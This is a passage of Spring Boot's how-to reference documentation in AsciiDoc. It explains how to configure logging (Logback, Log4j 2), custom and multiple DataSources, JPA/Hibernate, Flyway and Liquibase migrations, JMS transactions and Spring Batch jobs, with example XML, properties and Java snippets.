e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to log to (in addition to the console) using\n\"logging.file\".\n\nTo configure the more fine-grained settings of a logging system you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default Spring Boot\npicks up the native configuration from its default location for the system (e.g.\n`classpath:logback.xml` for Logback), but you can set the location of the config file\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for logging\nIf you put a `logback.xml` in the root of your classpath it will be picked up from\nthere\n(or `logback-spring.xml` to take advantage of the templating features provided by Boot).\nSpring Boot provides a default base configuration that you can include if you just\nwant to set levels, e.g.\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/base.xml\"\/>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nIf you look at that `base.xml` in the spring-boot jar, you will see that it uses\nsome useful System properties which the `LoggingSystem` takes care of creating for you.\nThese are:\n\n* `${PID}` the current process ID.\n* `${LOG_FILE}` if `logging.file` was set in Boot's external configuration.\n* `${LOG_PATH}` if `logging.path` was set (representing a directory for\n log files to live in).\n* `${LOG_EXCEPTION_CONVERSION_WORD}` if `logging.exception-conversion-word` was set in\n Boot's external configuration.\n\nSpring Boot also provides some nice ANSI colour terminal output on a console (but not in\na log file) using a custom Logback converter. See the default `base.xml` configuration\nfor details.\n\nIf Groovy is on the classpath you should be able to configure Logback with\n`logback.groovy` as well (it will be given preference if present).\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure logback for file only output\nIf you want to disable console logging and write output only to a file you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for logging\nSpring Boot supports http:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you are using the starters for\nassembling dependencies that means you have to exclude Logback and then include log4j 2\ninstead. If you aren't using the starters then you need to provide `jcl-over-slf4j`\n(at least) in addition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes, .e.g. in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The use of the Log4j starters gathers together the dependencies for common logging\nrequirements (e.g. including having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). See the Actuator Log4j 2 samples for more detail and to see it in\naction.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\n\n\n[[howto-configure-a-datasource]]\n=== Configure a custom DataSource\nTo configure your own `DataSource` define a `@Bean` of that type in your configuration.\nSpring Boot will reuse your `DataSource` anywhere one is required, including database\ninitialization. If you need to externalize some settings, you can easily bind your\n`DataSource` to the environment (see\n<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>).\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the url, the\nusername and the pool size, these settings will be bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> will also happen\n(so the relevant sub-set of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nYou can apply the same principle if you are configuring a custom JNDI `DataSource`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() throws Exception {\n\t\tJndiDataSourceLookup dataSourceLookup = new JndiDataSourceLookup();\n\t\treturn dataSourceLookup.getDataSource(\"java:comp\/env\/jdbc\/YourDS\");\n\t}\n----\n\nSpring Boot also provides a utility builder class `DataSourceBuilder` that can be used to\ncreate one of the standard data sources (if it is on the classpath). The builder can\ndetect the one to use based on what's available on the classpath. It also auto detects the\ndriver based on the JDBC url.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all that is needed really is the connection\ninformation; pool-specific settings can also be provided, check the implementation that\nis going to be used at runtime for more details.\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nThere is a catch however. Because the actual type of the connection pool is not exposed,\nno keys are generated in the metadata for your custom `DataSource` and no completion is\navailable in your IDE (The `DataSource` interface doesn't expose any property). Also, if\nyou happen to _only_ have Hikari on the classpath, this basic setup will not work because\nHikari has no `url` parameter (but a `jdbcUrl` parameter). You will have to rewrite\nyour configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated\nimplementation rather than `DataSource`. You won't be able to change the implementation\nat runtime but the list of options will be explicit.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you, that is\nproviding a default embedded database if no url is provided with a sensible username and\npassword for it. You can easily initialize a `DataSourceBuilder` from the state of any\n`DataSourceProperties` so you could just as well inject the one Spring Boot creates\nautomatically. However, that would split your configuration in two namespaces: url,\nusername, password, type and driver on `spring.datasource` and the rest on your custom\nnamespace (`app.datasource`). To avoid that, you can redefine a custom\n`DataSourceProperties` on your custom namespace:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in pair_ with what Spring Boot does for you by default, except that\na dedicated connection pool is chosen (in code) and its settings are exposed in the same\nnamespace. Because `DataSourceProperties` is taking care of the `url`\/`jdbcUrl`\ntranslation for you, you can configure it like this:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`\nwill have no effect. In practice the builder will be initialized with whatever value you\nmight set there and then overridden by the call to `.type()`.\n\nSee _<<spring-boot-features.adoc#boot-features-configure-datasource>>_ in the\n'`Spring Boot features`' section and the\n{sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]\nclass for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are\ndescribed in the previous section. You must, however, mark one of the `DataSource`\n`@Primary` as various auto-configurations down the road expect to be able to get one by\ntype.\n\nIf you create your own `DataSource`, the auto-configuration will back off. In the example\nbelow, we provide the _exact_ same features set than what the auto-configuration provides\non the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `fooDataSourceProperties` has to be flagged `@Primary` so that the database\ninitializer feature uses your copy (should you use that).\n\nBoth data sources are also bound for advanced customizations. For instance you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.foo.type=com.zaxxer.hikari.HikariDataSource\n\tapp.datasource.foo.maximum-pool-size=30\n\n\tapp.datasource.bar.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.bar.username=dbuser\n\tapp.datasource.bar.password=dbpass\n\tapp.datasource.bar.max-total=30\n----\n\nOf course, you can apply the same concept to the secondary `DataSource` as well:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThis final example configures two data sources on custom namespaces with the same logic\nthan what Spring Boot would do in auto-configuration.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data repositories\nSpring Data can create implementations for you of `@Repository` interfaces of various\nflavors. Spring Boot will handle all of that for you as long as those `@Repositories`\nare included in the same package (or a sub-package) of your `@EnableAutoConfiguration`\nclass.\n\nFor many applications all you will need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb), create some repository interfaces to handle your\n`@Entity` objects. Examples are in the {github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample]\nor the {github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity definitions from Spring configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA properties\nSpring Data JPA already provides some vendor-independent configuration options (e.g.\nfor SQL logging) and Spring Boot exposes those, and a few more for hibernate as external\nconfiguration properties. Some of them are automatically detected according to the context\nso you shouldn't have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case in that it has different defaults\ndepending on whether you are using an embedded database (`create-drop`) or not (`none`).\nThe dialect to use is also automatically detected based on the current `DataSource` but\nyou can set `spring.jpa.database` yourself if you want to be explicit and bypass that\ncheck on startup.\n\nNOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate\ndialect. Several databases have more than one `Dialect` and this may not suit your need.\nIn that case, you can either set `spring.jpa.database` to `default` to let Hibernate figure\nthings out or set the dialect using the `spring.jpa.database-platform` property.\n\nThe most common options to set are:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition all properties in `+spring.jpa.properties.*+` are passed through as normal JPA\nproperties (with the prefix stripped) when the local `EntityManagerFactory` is created.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nSpring Boot provides a consistent naming strategy regardless of the Hibernate generation\nthat you are using. If you are using Hibernate 4, you can customize it using\n`spring.jpa.hibernate.naming.strategy`; Hibernate 5 defines a `Physical` and `Implicit`\nnaming strategies.\n\nSpring Boot configures `SpringPhysicalNamingStrategy` by default. This implementation\nprovides the same table structure as Hibernate 4: all dots are replaced by underscores and\ncamel cases are replaced by underscores as well. By default, all table names are generated\nin lower case but it is possible to override that flag if your schema requires it.\n\nConcretely, a `TelephoneNumber` entity will be mapped to the `telephone_number` table.\n\nIf you'd rather use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\n\nSee {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]\nand {sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor more details.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add\na `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its\nentity manager based on the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you will need to define a new one\nbecause otherwise the presence of the second bean of that type will switch off the\ndefault. To make it easy to do that you can use the convenient `EntityManagerBuilder`\nprovided by Spring Boot, or if you prefer you can just use the\n`LocalContainerEntityManagerFactoryBean` directly from Spring ORM.\n\nExample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nThe configuration above almost works on its own. To complete the picture you need to\nconfigure `TransactionManagers` for the two `EntityManagers` as well. One of them could\nbe picked up by the default `JpaTransactionManager` in Spring Boot if you mark it as\n`@Primary`. The other would have to be explicitly injected into a new instance. Or you\nmight be able to use a JTA transaction manager spanning both.\n\nIf you are using Spring Data, you need to configure `@EnableJpaRepositories` accordingly:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a traditional persistence.xml\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default. If you\nprefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of type\n`LocalEntityManagerFactoryBean` (with id '`entityManagerFactory`', and set the persistence\nunit name there.\n\nSee\n{sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo repositories\n\nSpring Data JPA and Spring Data Mongo can both create `Repository` implementations for you\nautomatically. If they are both present on the classpath, you might have to do some extra\nconfiguration to tell Spring Boot which one (or both) you want to create repositories for\nyou. The most explicit way to do that is to use the standard Spring Data\n`+@Enable*Repositories+` and tell it the location of your `Repository` interfaces\n(where '`*`' is '`Jpa`' or '`Mongo`' or both).\n\nThere are also flags `+spring.data.*.repositories.enabled+` that you can use to switch the\nauto-configured repositories on and off in external configuration. This is useful for\ninstance in case you want to switch off the Mongo repositories and still use the\nauto-configured `MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data\nrepository types (Elasticsearch, Solr). Just change the names of the annotations and flags\nrespectively.\n\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data repositories as REST endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you as\nlong as Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties from the `spring.data.rest` namespace that\ncustomize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you don't specify any order on your custom `RepositoryRestConfigurer` it will run\nafter the one Spring Boot uses internally. If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a component that is used by JPA\nIf you want to configure a component that will be used by JPA then you need to ensure\nthat the component is initialized before JPA. Where the component is auto-configured\nSpring Boot will take care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that the latter has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you are using Hibernate Search with\nElasticsearch as its index manager then any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each, refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database initialization\nAn SQL database can be initialized in different ways depending on what your stack is. Or\nof course you can do it manually as long as the database is a separate process.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a database using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\n independent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\n behavior in a more fine-grained way. See below for more detail.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a database using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, `create-drop`. Spring Boot chooses a\ndefault value for you based on whether it thinks your database is embedded (default\n`create-drop`) or not (default `none`). An embedded database is detected by looking at the\n`Connection` type: `hsqldb`, `h2` and `derby` are embedded, the rest are not. Be careful\nwhen switching from in-memory to a '`real`' database that you don't make assumptions about\nthe existence of the tables and data in the new platform. You either have to set `ddl-auto`\nexplicitly, or use one of the other mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the <<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath will be executed on\nstartup if Hibernate creates the schema from scratch (that is if the `ddl-auto` property\nis set to `create` or `create-drop`). This can be useful for demos and for testing if you\nare careful, but probably not something you want to be on the classpath in production. It\nis a Hibernate feature (nothing to do with Spring).\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a database\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and\ninitialize it (DML scripts): it loads SQL from the standard root classpath locations\n`schema.sql` and `data.sql`, respectively. In addition Spring Boot will process the\n`schema-${platform}.sql` and `data-${platform}.sql` files (if present), where `platform`\nis the value of `spring.datasource.platform`. This allows you to switch to database\nspecific scripts if necessary, e.g. you might choose to set it to the vendor name of the\ndatabase (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql` etc.).\n\nSpring Boot enables the fail-fast feature of the Spring JDBC initializer by default, so if\nthe scripts cause exceptions the application will fail to start. You can tune that using\n`spring.datasource.continue-on-error`.\n\nNOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use\n`schema.sql` but not both. Make sure to disable `spring.jpa.hibernate.ddl-auto` if you\nchose the later.\n\nYou can also disable initialization by setting `spring.datasource.initialize` to `false`.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch database\nIf you are using Spring Batch then it comes pre-packaged with SQL initialization scripts\nfor most popular database platforms. Spring Boot will detect your database type, and\nexecute those scripts by default, and in this case will switch the fail fast setting to\nfalse (errors are logged but do not prevent the application from starting). This is\nbecause the scripts are known to be reliable and generally do not contain bugs, so errors\nare ignorable, and ignoring them makes the scripts idempotent. You can switch off the\ninitialization explicitly using `spring.batch.initializer.enabled=false`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a higher-level database migration tool\nSpring Boot supports two higher-level migration tools: http:\/\/flywaydb.org\/[Flyway]\nand http:\/\/www.liquibase.org\/[Liquibase].\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway database migrations on startup\nTo automatically run Flyway database migrations on startup, add the\n`org.flywaydb:flyway-core` to your classpath.\n\nThe migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an\nunderscore-separated version, e.g. '`1`' or '`2_1`'). By default they live in a folder\n`classpath:db\/migration` but you can modify that using `flyway.locations`. You can also\nadd a special `{vendor}` placeholder to use vendor-specific scripts. Assume the following:\n\n[source,properties,indent=0]\n----\n\tflyway.locations=db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, this configuration will set the folder to use according\nto the type of the database (i.e. `db\/migration\/mysql` for MySQL). The list of supported\ndatabase are available in {sc-spring-boot}\/jdbc\/DatabaseDriver.{sc-ext}[`DatabaseDriver`].\n\nSee also the Flyway class from flyway-core for details of available settings like schemas\netc. In addition Spring Boot provides a small set of properties in\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[`FlywayProperties`]\nthat can be used to disable the migrations, or switch off the location checking. Spring\nBoot will call `Flyway.migrate()` to perform the database migration. If you would like\nmore control, provide a `@Bean` that implements\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].\n\nTIP: If you want to make use of http:\/\/flywaydb.org\/documentation\/callbacks.html[Flyway\ncallbacks], those scripts should also live in the `classpath:db\/migration` folder.\n\nBy default Flyway will autowire the (`@Primary`) `DataSource` in your context and\nuse that for migrations. If you like to use a different `DataSource` you can create\none and mark its `@Bean` as `@FlywayDataSource` - if you do that remember to create\nanother one and mark it as `@Primary` if you want two data sources.\nOr you can use Flyway's native `DataSource` by setting `flyway.[url,user,password]`\nin external properties.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-flyway[Flyway sample] so\nyou can see how to set things up.\n\nYou can also use Flyway to provide data for specific scenarios. For example, you can\nplace test-specific migrations in `src\/test\/resources` and they will only be run when your\napplication starts for testing. If you want to be more sophisticated you can use\nprofile-specific configuration to customize `flyway.locations` so that certain migrations\nwill only run when a particular profile is active. For example, in\n`application-dev.properties` you could set `flyway.locations` to\n`classpath:\/db\/migration, classpath:\/dev\/db\/migration` and migrations in `dev\/db\/migration`\nwill only run when the `dev` profile is active.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase database migrations on startup\nTo automatically run Liquibase database migrations on startup, add the\n`org.liquibase:liquibase-core` to your classpath.\n\nThe master change log is by default read from `db\/changelog\/db.changelog-master.yaml` but\ncan be set using `liquibase.change-log`. In addition to YAML, Liquibase also supports\nJSON, XML, and SQL change log formats.\n\nBy default Liquibase will autowire the (`@Primary`) `DataSource` in your context and use\nthat for migrations. If you like to use a different `DataSource` you can create one and\nmark its `@Bean` as `@LiquibaseDataSource` - if you do that remember to create another one\nand mark it as `@Primary` if you want two data sources. Or you can use Liquibase's native\n`DataSource` by setting `liquibase.[url,user,password]` in external properties.\n\nSee\n{sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]\nfor details of available settings like contexts, default schema etc.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-liquibase[Liquibase sample]\nso you can see how to set things up.\n\n\n\n[[howto-messaging]]\n== Messaging\n\n\n\n[[howto-jms-disable-transaction]]\n=== Disable transacted JMS session\nIf your JMS broker does not support transacted session, you will have to disable the\nsupport of transactions altogether. If you create your own `JmsListenerContainerFactory`\nthere is nothing to do since it won't be transacted by default. If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted session as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThis overrides the default factory and this should be applied to any other factory that\nyour application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch applications\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you'll need to implement `BatchConfigurer`, see\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch jobs on startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (comma-separated job name patterns).\n\nIf the application context includes a `JobRegistry` then the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\n\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP port or address of the actuator endpoints\nIn a standalone application the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port set the external property\n`management.port`. To listen on a completely different network address (e.g. if you have\nan internal network for management and an external one for user applications) you can\nalso set `management.address` to a valid IP address that the server is able to bind to.\n\nFor more detail look at the\n{sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]\nsource code 